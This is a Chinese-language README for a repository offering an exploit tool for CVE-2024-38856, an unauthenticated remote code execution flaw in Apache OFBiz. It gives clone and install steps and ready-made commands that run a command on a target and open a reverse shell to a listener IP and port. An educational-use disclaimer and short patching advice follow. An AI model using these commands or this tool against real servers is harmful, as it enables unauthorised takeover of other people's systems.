Apache OFBiz漏洞利用工具(CVE-2024-38856) 作者:Alisson Faoli
该仓库包含针对 Apache OFBiz 中 CVE-2024-38856 漏洞的利用工具。该漏洞允许未认证的远程代码执行(RCE)。
注意:此利用工具仅供教育和研究目的使用。滥用可能违法,用户须自行承担全部责任。
CVE:CVE-2024-38856
受影响软件:Apache OFBiz 至 18.12.14 版本
漏洞类型:RCE
利用条件:无需认证
克隆仓库:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
安装依赖:
pip install -r requirements.txt
运行利用工具:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
为修复此漏洞,建议 Apache OFBiz 管理员: 更新至补丁版本,可从 https://ofbiz.apache.org/download.html 获取。 应用防火墙或 WAF 规则以阻止已知的利用尝试。
如有任何疑问或希望报告对利用工具的改进,请联系我: LinkedIn:https://linkedin.com/in/alisson-faoli/
此代码仅提供用于教育目的和在授权环境中进行安全测试。作者不对任何滥用行为负责。